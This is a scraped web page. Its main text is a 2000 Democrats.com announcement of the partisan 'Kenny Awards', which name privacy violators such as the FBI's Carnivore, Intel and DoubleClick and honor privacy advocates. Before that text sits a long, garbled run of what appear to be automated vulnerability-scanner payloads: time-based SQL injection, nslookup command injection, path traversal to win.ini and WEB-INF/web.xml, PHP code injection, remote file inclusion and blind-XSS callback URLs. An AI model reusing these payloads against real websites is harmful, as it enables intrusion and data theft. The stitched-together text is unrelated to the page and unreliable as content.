11111111111insert_process.cfminsert_process.cfminsert_process.cfm/.111111insert_process.cfm11111111insert_process.cfminsert_process.cfm/.11111111111111112345'"\'\");|]*111111111111112345'"\'\");|]*11111111111111111111111111111111111111111111111111response.write(9442106*9224416)'+response.write(9442106*9224416)+'"+response.write(9442106*9224416)+"set|set&set$(nslookup SvNYhN6V)&nslookup ygJwranN&'\"`0&nslookup ygJwranN&`'response.write(9614441*9895836)"+response.write(9614441*9895836)+"set|set&set$(nslookup 59rzJ7Pv)'+response.write(9614441*9895836)+'&nslookup iPlm9mf4&'\"`0&nslookup iPlm9mf4&`'1111111111111${9999485+9999565}${9999243+10000063}111111vyhJNAxBua78io8g1111111111111111http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg1some_inexistent_file_with_long_nameHttp://testasp.vulnweb.com/t/fit.txthttp://testasp.vulnweb.com/t/fit.txt?.jpgtestasp.vulnweb.com111Http://testasp.vulnweb.com/t/fit.txt11111111111111111111111111http://testasp.vulnweb.com/t/fit.txt?.jpg1http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg1some_inexistent_file_with_long_nametestasp.vulnweb.com11111-1 OR 2+735-735-1=0+0+0+1 -- -1 OR 2+511-511-1=0+0+0+1if(now()=sysdate(),sleep(31),0)/*'XOR(if(now()=sysdate(),sleep(31),0))OR'"XOR(if(now()=sysdate(),sleep(31),0))OR"*/-1; waitfor delay '0:0:62' -- -1); waitfor delay '0:0:62' -- 1 waitfor delay '0:0:62' -- 11-1' OR 2+683-683-1=0+0+0+1 -- -1' OR 2+631-631-1=0+0+0+1 or 'mLSbVpTG'='-1" OR 2+964-964-1=0+0+0+1 -- (select(0)from(select(sleep(62)))v)/*'+(select(0)from(select(sleep(62)))v)+'"+(select(0)from(select(sleep(62)))v)+"*/-1)); waitfor delay '0:0:62' -- iyYzYFcO'; waitfor delay '0:0:62' -- QBlnTJSa'); waitfor delay '0:0:93' -- -1));select pg_sleep(93); -- 9AkZS8wP';select pg_sleep(93); -- 1uaBtWnLG'));select pg_sleep(31); -- DGB0k2UR')); waitfor delay '0:0:93' -- -1;select pg_sleep(93); -- -1);select pg_sleep(93); -- 11xB0BqiXB');select pg_sleep(31); -- 111111../../../../../../../../../../boot.ini111)1!(()&&!|*|*|^(#$!@#$)(()))******111111111!(()&&!|*|*|^(#$!@#$)(()))******)11111111111111111111111111111111../../../../../../../../../../boot.ini../../../../../../../../../../windows/win.ini../../../../../../../../windows/win.ini................windowswin.ini..\..\..\..\..\..\..\..\windows\win.ini/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.iniWEB-INF/web.xmlWEB-INF\web.xml1111111111../../../../../../../../windows/win.ini................windowswin.ini/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.iniWEB-INF/web.xmlWEB-INF\web.xml..\..\..\..\..\..\..\..\windows\win.ini1../../../../../../../../../../windows/win.ini../../../../../../../../../../windows/win.ini../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini111111'"()1111111-1 OR 2+760-760-1=0+0+0+1 -- -1' OR 2+421-421-1=0+0+0+1 -- -1' OR 2+405-405-1=0+0+0+1 or 'PCkV7wJ2'='-1" OR 2+675-675-1=0+0+0+1 -- if(now()=sysdate(),sleep(33),0)/*'XOR(if(now()=sysdate(),sleep(33),0))OR'"XOR(if(now()=sysdate(),sleep(33),0))OR"*/(select(0)from(select(sleep(33)))v)/*'+(select(0)from(select(sleep(33)))v)+'"+(select(0)from(select(sleep(33)))v)+"*/-1; waitfor delay '0:0:33' -- -1); waitfor delay '0:0:33' -- -1)); waitfor delay '0:0:11' -- 1 waitfor delay '0:0:11' -- 66asMFgb'; waitfor delay '0:0:11' -- ve3elbYc'); waitfor delay '0:0:11' -- bImDJvDi')); waitfor delay '0:0:11' -- -1;select pg_sleep(11); -- -1);select pg_sleep(22); -- -1));select pg_sleep(22); -- WKQJDqIJ';select pg_sleep(22); -- O1Ax6KJw');select pg_sleep(22); -- nhb7qKs8'));select pg_sleep(22); -- -1 OR 2+938-938-1=0+0+0+11111111111111../../../../../../../../../../windows/win.ini1111111111111111111111111http://hittGjz3EEsdh.bxss.me/11111http://hit4hKN7AdJMk.bxss.me/111111;print(md5(acunetix_wvs_security_test));';print(md5(acunetix_wvs_security_test));$a='";print(md5(acunetix_wvs_security_test));$a="${@print(md5(acunetix_wvs_security_test))}${@print(md5(acunetix_wvs_security_test))}\'"()11${@print(md5(acunetix_wvs_security_test))}\11111111111111http://testasp.vulnweb.com/t/xss.html?%00.jpghttp://testasp.vulnweb.com/t/xss.html?%00.jpg11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))111111111111)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))111111111;print(md5(acunetix_wvs_security_test));1';print(md5(acunetix_wvs_security_test));$a='1";print(md5(acunetix_wvs_security_test));$a="11${@print(md5(acunetix_wvs_security_test))}111111111111111111111111111111111111111111111111111111111111111111111111'"

Kenny Awards

On August 16, 2000, Democrats.com proudly presented the first annual Ken Starr Awards, better known as The Kennys.

The presentation was part of our kickoff "Hush-In on Privacyat the Democratic Convention in Los Angeles.

The Kennys are inspired by Special Prosecutor Ken Starr, who would stop at nothing in his prosecutorial zeal to "get" President Clinton. In Ken Starr's right-wing view, you have no rights.

Bad Kennys were awarded to the worst violators of our privacy rights, while Good Kennys were awarded to champions of privacy.

Our right to privacy is in greater danger than ever, thanks to advances in technology including the Internet. Worse yet, some bureaucrats, companies, and conservative ideologues actually believe that we have no right to privacy.

While the issues are serious, The Kennys are fun because Ken Starr deserves to go down in history as a joke. After spending 5 years and $60 million investigating every detail of President Clinton's life, Starr failed spectacularly - just like cartoon legend Elmer Fudd, to whom Starr bears a striking resemblance.

Bad Kennys

NomineeKenny Award NameDescription


T-RexCarnivore system for monitoring without a warrant
kenny-intel-insideInside JobSecret ID on every Pentium III chip
DoubleclickDoubleCrossAttempting to merge online and offline profiles
RealNetworksReal NetworksReality BitesTracking downloads by software users
kenny-toysmartBig Bad WolfTrying to sell information on kids
gop-elephantRepublican PartyTerminatorKilling all privacy protection legislation
Ken Star Lips PursedKen StarrElmer FuddSpending $60 million to "get" the Clintons - and only wounding himself


Bad Kenny Descriptions

FBI. The "T-Rex Kenny" emerges from the forests of darkness to go to FBI, proud creator of the Internet wiretapping system "Carnivore". Why do they call it "Carnivore"? Because it's the next evolution of its predecessor, "Omnivore". Omnivore swallowed up everything --jokes, recipes, viruses, beanie-baby auctions -- you name it!  It filled the FBI's hungry belly with too much data -- producing a government-sized stomach-ache. But alas, this did not help the FBI spot those needle-in-the-haystack threats to our National Security. So Carnivore lets the fattening stuff go by, and just swallows "the meat". Privacy advocates are in hot pursuit, but the FBI's Carnivore is still a ravenous dinosaur chomping down our right to privacy, so they are the winners of our T-Rex Kenny Award.

Intel: The "Inside-Job-Kenny" goes to Intel.  As the supplier of the microprocessor for most of America's personal computers, Intel is proud to plaster its "Intel Inside" sticker on the outsides of our computers.  But it isn't eager to reveal what its chips are really doing inside. When it was discovered that each Intel chip was shipped with a unique serial number making it possible for web sites to identify and track every Intel customer, Intel tried to argue that this was no big deal. Privacy advocates launched the "Big Brother Inside" campaign, which ultimately forced Intel to change its ways. But Intel has abused our trust, so they are the winners of our Inside Job Kenny award. 

Doubleclick: The "Doublecross Kenny" goes to Doubleclick, the largest Internet advertising solutions company.  Doubleclick is the company that clogs up our browsers with all of those annoying banner ads like "catch the monkey". Well, it turns out that Doubleclick doesn't just distract us - it also tracks our online behavior. In the past, people didn't complain much about this spying because it was supposed to be anonymous. But then Doubleclick bought a company called Abacus, which owns a massive file of names, addresses, and stuff you buy offline. Privacy advocates forced Doubleclick to back off - for now at least. But Doubleclick tried to sell out our privacy, so they are the winners of our Doublecross Kenny award.

Real Networks: The "Reality Bites Kenny" goes to Real Networks, the largest audio and video streaming technology company. Re Networks produces nifty software like RealJukebox, which you can load onto your computer to listen to music over the Internet. Real Networks also hosts progressive radio programs like Democracy Now and Jim Hightower on its Webactive site. Unfortunately, some senseless programmers at Real Networks turned RealJukebox into a spy system to send back reports on which songs its customers were playing - until privacy advocates caught them in the act. Real Networks has learned that consumers take privacy seriously, so they are the winners of our Reality Bites Kenny award.

Toysmart:  The "Big Bad Wolf Kenny" goes to Toysmart, an Internet toy store that urges parents to "click on their child's potential." Toysmart seems like the kind of place where kids are safe, and Toysmart was proud of its privacy policy, which promised never to sell information about its little customers. But when sales remained kid-sized and Toysmart faced bankruptcy, they changed their tune and tried to sell their list of children. Privacy advocates challenged this sale and ultimately stopped it. But Toysmart has bared its long teeth, so they are the winners of our Big Bad Wolf Kenny award.

Republican Party: The "Terminator Kenny" goes to the Republican Party, the party that puts profits before people regardless of the issue. Privacy abuses like those of our Kenny winners have made headlines and prompted citizens to demand tougher laws to protect privacy. But when Democrats like Representatives Louise Slaughter, Jay Inslee, and Ed Markey have drafted laws that would make a difference, Republicans like Phil Gramm, Jim Jeffords, Tom DeLay, and Bill McCollum have led their fellow Republicans in successful efforts to stop those laws dead. The Republican Party has taken its stand, and it stands solidly against passing laws to protect privacy, with privacy abusers rather than the people, so the Republican Party is the winner of our Terminator Kenny award.

Ken Starr: The "Elmer Fudd Kenny" goes to Ken Starr himself, the hero of our Ken Starr Awards. Ken Starr likes to pose as the paragon of virtue, a modern-day moral saint waging a crusade against our corrupt morals. But something about the Clintons makes Starr go wild with rage, like Elmer Fudd pursuing Buggs Bunny. Starr spent 6 years and $60 million dollars trying to "get" Bill and Hillary Clinton, using the almost unlimited powers of the independent prosecutor. He fired a lot of shots, but in the end the shots backfired and brought about the end of the independent counsel law. Starr's failed bumbling crusade also made Starr a national joke, so Ken Starr is the winner of our Elmer Fudd Kenny award.


Good Kennys

Rep. Louise SlaughterRep. Louise Slaughter is a leader in Congress on privacy. As a microbiologist, Congresswoman Slaughter understands the critical importance of privacy in our health care system. Throughout her career, she has fought to protect the fundamental right of privacy that is at the core of the Supreme Court's 1973 decision in Roe v. Wade that recognized a woman's right to choose. More recently, Louise has led the fight to protect Americans against abuse of genetic profiles, so no one loses their job or their insurance as a result of a confidential diagnostic test.
Jay InsleeRepresentative Jay Inslee of Washington State's 1st district is also a leader in Congress on privacy. Congressman Inslee gave a masterful address to the Convention yesterday afternoon that was the first mention in the big hall of privacy, an issue that we think Americans are anxious to hear more about. He has worked hard in the Congress to protect the privacy of financial records. He has fought to create a right for consumers to opt out of the use of their private information for marketing purposes. If we get a Democratic majority in Congress this November much of what Congressman Inslee has been fighting for on our behalf will finally become law.
Christine GregoireChristine Gregoire is the Attorney General of the State of Washington, which is home to some of the largest Internet companies. General Gregoire is the state's leading consumer advocate, and she has led the fight to protect the privacy of the citizens of her home state. In addition, General Gregoire serves as chair of the National Association of Attorneys General, and has led the fight nationally to protect the privacy of all Americans.
hush-gregGreg Simon is a top of advisor to Al Gore for almost twenty years now. Greg has been among the Vice President’s most trusted advisers on technology issues, and one of the people whose work has enabled Al Gore to direct the nation’s attention to the almost entirely unregulated markets in information about consumers.
Robert Ellis SmithRobert Ellis Smith is a journalist who uses his training as an attorney to report on an individual’s right to privacy. He has published Privacy Journal, a monthly newsletter, since 1974 and is the author most recently of Ben Franklin’s Web Site: Privacy and Curiosity from Plymouth Rock to the Internet.
NapoliLisa Napoli has been covering the online world since the early days of the Internet. A former columnist and reporter for the New York Times CyberTIMES, she has also been a television producer and documentary film-maker.
Bob GellmanRobert Gellman is a privacy and information consultant in Washington, D.C A Yale Law School graduate, he served for 17 years as chief counsel to the Subcommittee on Government Information in the House of Representatives. In 1996 he was appointed as amember of the Department of Health and Human Service's National Committee on Vital and Health Statistics.
hush-evanEvan Hendricks has served since 1981 as Editor/Publisher of the Privacy Times, a biweekly newsletter in Washington that reports on privacy and freedom of information law. He is also author of Your Right To Privacy.
El St. JohnEl St. John is an entrepreneur who established Silver Tech, Inc. in 1997 and has patented its 'Private Internet Engine', which enables groups to build secure private Internets on top of the openpublic Internet. The first application of this technology is eKidsInternet.com, worlds first private Internet network for kids that features its own browser and search engine. Prior this El founded Golden Road Presents, Inc., a television production company.
FowlerAlex Fowler is the Senior Director of Policy and Advocacy for Zero-Knowledge Systems, a leading developer of Internet privacy technologies. A recognized authority on Internet policy issues, Alex is a former VP of strategic initiatives for the Electronic Frontier Foundation.
David BrinDavid Brin is a scientist and author whose works of fiction have been New York Times bestsellers and whose most recent non-fiction work, The Transparent Society, has received numerous awards and honors.